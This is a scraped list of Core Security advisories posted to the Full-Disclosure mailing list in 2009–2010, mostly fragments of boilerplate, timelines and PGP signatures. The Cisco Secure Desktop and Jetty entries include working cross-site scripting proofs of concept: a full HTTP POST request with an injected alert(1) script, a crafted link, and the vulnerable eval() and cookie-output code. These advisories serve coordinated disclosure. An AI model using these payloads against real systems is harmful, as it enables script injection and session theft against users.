solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.12 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkuNb5cACgkQyNibggitWa12/ACcC02DZ6CO4m4rGbtHxNTw97Xu D80Anjwp3e0eHeNHzEmRQr/zIS/vBFKK =FwUB -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0827: Microsoft Office Excel / Word OfficeArtSpgr Container Pointer Overwrite Vulnerability
es that the ship date for the vulnerability MSRC 9368 in MSO.dll is still February 9th 2010 (the spreadsheet contained a clerical error). . 2010-02-01: Core requests MSRC the list of non vulnerable versions of Excel / Office, and a statement for the "vendor information" section of the advisory. . 2010-02-03: Microsoft sends the CVE identifier for the vulnerability, and the list of affected and non affected software. . 2010-02-09: The advisory CORE-2009-0827 is published. 10. *References* [1] About Core Security's Bugweek http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=project&name=Bugweek [2] Microsoft Security Bulletin MS10-003 http://www.microsoft.com/technet/security/bulletin/MS10-003.msp 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAktxq9cACgkQyNibggitWa2ZfgCgsgImwlV9D+uNQnuzgmWefT8U BngAn06q1Ub1HhaqeKBigZaI3SCCPFg3 =Cmi1 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0121] Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers
nning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAktsincACgkQyNibggitWa3Z5ACfYMSjRozwndnvWAldcCRo5W5C kUEAnjY2dmFWup/6s1GV9vALr3u1Wbfy =MTyQ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0625: Internet Explorer Dynamic OBJECT tag and URLMON sniffing vulnerabilities
bypass. http://www.coresecurity.com/content/ie-security-zone-bypass [3] Understanding and Working in Protected Mode Internet Explorer. http://msdn.microsoft.com/en-us/library/bb250462(VS.85).aspx [4] Protected Mode for IE7 in Windows Vista - Is it On or Off? http://blogs.msdn.com/ie/archive/2007/04/04/protected-mode-for-ie7-in-windows-vista-is-it-on-or-off.aspx [5] Jorge Luis Alvarez Medina, Abusing Insecure Feature of Internet Explorer, Feb. 2010 http://corelabs.coresecurity.com/index.php?module=wiki%38action=attachment%38type=publication%38page=Abusing_insecure_features_of_Internet_Explorer-article.pdf [6] Jorge Luis Alvarez Medina, Internet Explorer turns your personal computer into a public File Server, BlackHat Technical Security conference, Feb. 2010, Washington D.C., USA. http://corelabs.coresecurity.com/index.php?module=wiki%38action=attachment%38type=publication%38page=Abusing_insecure_features_of_Internet_Explorer-BHDC2010-Slides.pdf [7] Wikipedia, Trident (layout engine). http://en.wikipedia.org/wiki/Trident_(layout_engine) [8] Microsoft Security Bulletin MS09-019, Cumulative Security Update for Internet Explorer, June 10 2009. http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAktp59YACgkQyNibggitWa3e/ACfS+zHvcSqTFyJrqR6D1fTKk6O GoUAmQEk6qwbnHFaodbAhQOw8kaPtuTO =/WSE -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2009-1126] Corel Paint Shop Pro Photo X2 FPX Heap Overflow
project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAktnPikACgkQyNibggitWa2BxgCfYtSY/FIhVjOtPxriGUpmReS/ tdoAnA0zeotWIo3c7UkokdVq2UIi+4yk =Onam -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0106] Cisco Secure Desktop XSS/JavaScript Injection
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Cisco Secure Desktop XSS/JavaScript Injection
1. *Advisory Information*
Title: Cisco Secure Desktop XSS/JavaScript Injection
Advisory Id: CORE-2010-0106
Advisory URL: http://www.coresecurity.com/content/cisco-secure-desktop-xss
Date published: 2010-02-01
Date of last update: 2010-02-01
Vendors contacted: Cisco
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Cross site scripting [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 37960
CVE Name: CVE-2010-0440
3. *Vulnerability Description*
The Cisco Secure Desktop web application does not sufficiently verify if
a well-formed request was provided by the user who submitted the POST
request, resulting in a cross-site scripting vulnerability.
In order to be able to sucessfully make the attack, the Secure Desktop
application on the Cisco Appliance must be turned on.
4. *Vulnerable packages*
. Cisco Secure Desktop 3.4.2048
. Older versions are probably affected too, but they were not checked.
5. *Non-vulnerable packages*
. Cisco Secure Desktop 3.5.841
6. *Vendor Information, Solutions and Workarounds*
Cisco Security Alert:
http://tools.cisco.com/security/center/viewAlert.x?alertId=19843
7. *Credits*
This vulnerability was discovered and researched by Matias Pablo Brutti
from Core Security Technologies.
The publication of this advisory was coordinated by Jorge Lucangeli Obes
from Core Security Technologies Advisories Team.
8. *Technical Description / Proof of Concept Code*
Cross-site scripting (XSS) vulnerabilities allow an attacker to execute
arbitrary scripting code in the context of the user browser (in the
vulnerable application's domain). For example, an attacker could exploit
an XSS vulnerability to steal user cookies (and then impersonate the
legitimate user) or fake a page requesting information to the user
(i.e.: credentials). This vulnerability occurs when user-supplied data
is displayed without encoding.
The Cisco Secure Desktop web application does not sufficiently verify if
a well-formed request was provided by the user who submitted the POST
request. The cross-site scripting vulnerability was found in the
following file/url:
/-
https://{IP}//+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us
- -/
Using the POST variable:
/-
Starting, please wait...">alert(1);
- -/
The content of the POST field is not being encoded at the time of using
them in HTML output, therefore allowing an attacker who controls their
content to insert JavaScript code. Furthermore, we could possibly inject
JavaScript code into the 'start.html' page because the content of the
previously mentioned POST is used in 'binary/mainv.js' as input for an
'eval()' function, hence allowing an attacker to inject any code without
restrictions which will be executed in the context of the 'eval()'
function:
/-
282http_request.open('POST', path, false);
283http_request.send(msgs);
284var trans = new Array();
285try {
286eval(http_request.responseText);
287} catch (e) {}
- -/
8.1. *Proof of Concept*
/-
REQUEST:
POST
https://{IP}/+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us
HTTP/1.1
Host: {IP}
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9)
Gecko/2008052906 Firefox/3.0 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://{IP}/CACHE/sdesktop/install/start.htm
Content-Type: application/xml; charset=UTF-8
Cookie: webvpnLang=en-us; webvpnlogin=1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 56
Starting, please wait...">alert(1);
RESPONSE:
HTTP/1.1 200 OK
Server: Cisco AWARE 2.0
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Mon, 16 Nov 2009 14:14:07 GMT
Content-Length: 122
trans["Starting, please wait...\">alert(1);"] =
"Starting, please wait...\">alert(1);";
- -/
9. *Report Timeline*
. 2010-01-12:
Vendor contacted.
. 2010-01-12:
Cisco replies, saying that it will investigate the report.
. 2010-01-12:
Cisco tentatively acknowledges the February 5th release date.
. 2010-01-13:
Core replies, reassuring that the release date can be moved if Cisco
can't meet it.
. 2010-01-13:
Cisco updates, pointing to a beta version of Cisco Secure Desktop that
contains a fix for the vulnerability.
. 2010-01-13:
Cisco describes the fix and the non-vulnerable versions of the package.
. 2010-01-14
[Full-disclosure] CORE-2009-1013: Multiple XSS and Injection Vulnerabilities in TestLink Test Management and Execution System
verifiable claim is made that can assure Core of a planned fix and release. . 2009-11-27: Core reschedules its internal publication date for this advisory to December 14th. This will be the final date and a user-release will be made, unless TestLink developers share information that can be verified by Core that shows commitment to eventually looking into said bugs and fixing them. Core suggests that developers actually in charge of these issues are copied in the e-mail loop, or that access to internal issue-tracking tools be given to them to actively participate in the discussions and the patching process. . 2009-11-30: Martin Havlat asks for technical details needed by him to confirm some of these vulnerabilities. . 2009-12-01: Core replies with the technical details needed by Martin Havlat. . 2009-12-02: Martin Havlat sends a patched version of TestLink to Core asking for verification of fixes to some of the vulnerabilities reported in this advisory. . 2009-12-03: Core replies saying that the fixes proposed by Martin Havlat fail to patch those specific vulnerabilities. The bugs are further researched by Core and the advisory draft is modified to include a more detailed explanation of these bugs. This technical information is shared by Core with Martin Havlat and some insight into possible fixes is also given. . 2009-12-09: TestLink 1.8.5 is released. . 2009-12-09: Advisory CORE-2009-1013 is published. 10. *References* [1] http://www.owasp.org/index.php/Cross-site_Scripting_(XSS) [2] http://www.teamst.org/ [3] http://www.owasp.org/index.php/PHP_Top_5 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: GnuPT v3.6.3 Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAksgL9IACgkQyNibggitWa3csgCfdV5dyeDFf1r+/yNIO6PpDgvk LJgAoKTesYDuoe6SpJzMhPKujbi1Z0vV =H22d -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0911: DAZ Studio Arbitrary Command Execution
organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.12 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAksYGpcACgkQyNibggitWa3lrwCeKY5DAHCr9PaZ1Dk6FqMcrbUx mR8AoK6zHf4Ns/xzngH5kT+f4MDwbUpF =l/I+ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0910: Autodesk Maya Script Nodes Arbitrary Command Execution
ated in Core Bugweek 2009 as member of the team "Gimbal Lock N Load". [2] http://usa.autodesk.com/adsk/servlet/pc/index?siteID=123112&id=13577897 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.12 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAksK5eoACgkQyNibggitWa2e1gCeM9FzHnlmxrmA4dvfO8Dgp2Zm B3oAoKymyyouTh4rjoDIsHdhF/Ho50lQ =YfZn -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0909: Autodesk 3DS Max Application Callbacks Arbitrary Command Execution
lnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.12 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAksK5boACgkQyNibggitWa1jTgCgsSlNJKsbVSRtXaFylOQNbpCN TPwAn1AMCamFLaX3gHyUys//tHcyhlvn =fPrL -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0908: Autodesk SoftImage Scene TOC Arbitrary Command Execution
earch in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.12 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAksK5XkACgkQyNibggitWa0Y9gCfWWW7WNOXTqp8vLzSZaLPYXkr lioAoJBrvffk0he38J/wRbQ4jOrWOKXR =ce7Z -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-1027: IBM SolidDB invalid error code vulnerability
ility http://www.coresecurity.com/content/openview_nnm_internaldb_dos 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAksEO4YACgkQyNibggitWa1laACgik+qyd+ZQVgVPiERCKXVGCu/ kPgAoKAmw/r3PKYxfPb9Q2RC4Bzc8tbh =mnrD -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0814: HP Openview NNM 7.53 Invalid DB Error Code vulnerability
ents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAksDICYACgkQyNibggitWa2//ACdFpN6SK4B59Iza5Nq88oASfat YhoAn24UcNlJ/lpKv4brl4d6mctKfwMF =cR49 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0922: Jetty Persistent XSS in Sample Cookies Application
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Jetty Persistent XSS in Sample Cookies Application 1. *Advisory Information* Title: Jetty Persistent XSS in Sample Cookies Application Advisory Id: CORE-2009-0922 Advisory URL: http://www.coresecurity.com/content/jetty-persistent-xss Date published: 2009-10-06 Date of last update: 2009-10-06 Vendors contacted: Jetty Team Release mode: Coordinated release 2. *Vulnerability Information* Class: Persistent Cross-site Scripting [CWE-79] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: No Bugtraq ID: N/A CVE Name: N/A 3. *Vulnerability Description* Jetty [1] includes several sample web applications for the developer to learn from. One of them sets cookies with user supplied data, and then dumps them as html. This application does not filter the user supplied data when outputting it to the visitor. This constitutes a persistent XSS vulnerability [2]. This application accepts the cookie content as a GET parameter. This allows an attacker to trick someone into clicking a handcrafted link with malicious code as the cookie content, and thus executing that code in a privileged domain, such as localhost, any domain in the intranet zone, or a domain where another web application is running. For example, the following link will result in JavaScript code being executed on the localhost domain if the victim has deployed a default installation of Jetty in his workstation: http://localhost:8080/cookie/?Name=aaa&Value=bbbalert(1)bbbccc&Age=. 4. *Vulnerable packages* . Jetty 6.1.19 . Jetty 6.1.20 5. *Non-vulnerable packages* . Jetty 6.1.21 . Jetty 7.0.0 6. *Vendor Information, Solutions and Workarounds* A workaround is to disable this particular example on any running instance of Jetty in a particular workstation. Examples should always be disabled on production servers, as recommended by the software vendor. 7. *Credits* This vulnerability was discovered by Aureliano Calvo from Core Security Technologies during Bugweek 2009 [3]. 8. *Technical Description / Proof of Concept Code* The problem resides in the 'CookieDump.java' file from the examples. /- Cookie[] cookies = request.getCookies(); for (int i=0;cookies!=null && i"+cookies[i].getName()+"="+cookies[i].getValue()+""); } - -/ 'cookies[i].getValue()' should be filtered to avoid malicious code from being executed. 9. *Report Timeline* . 2009-09-22: Core Security Technologies contacts Jan Bartel and Greg Wilkins from Webtide, notifying them of the existence of a XSS vulnerability in a sample application. Core sends its PGP key and asks Jan for his, would he like to keep future communications encrypted. . 2009-09-23: Greg Wilkins asks for technical information about the vulnerability in plaintext. He also comments that some vulnerabilities have been fixed in the 6.1.21 and 7.0 releases, and asks Core to verify if the reported vulnerability has already been fixed in their repositories. . 2009-09-23: Technical details are sent by Core, specifying that the Persistent XSS that was discovered has not been fixed in the repositories pointed to by Greg. Core asks for a release date for the fixed version of Jetty in order to release the advisory only when a fixed version is available. . 2009-09-24: Greg Wilkins acknowledges the vulnerability and confirms it will be fixed on release 7.0.0, due the week of September 28th. A release date for Jetty 6.1.22 is not yet scheduled. Greg mentions that the recommended workaround for production servers is not to deploy the example applications. . 2009-09-28: Core reminds Greg that a deadline for the release of this advisory has been set to Monday October 5th. . 2009-09-28: Greg Wilkins agrees with the proposed publication date, since there is a good workaround. . 2009-10-06: The advisory CORE-2009-0922 is published. 10. *References* [1] http://jetty.mortbay.org/ [2] http://www.owasp.org/index.php/Cross-site_Scripting_(XSS) [3] The author participated in Core Bugweek 2009 as member of the team "Bugged Coffee". 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements 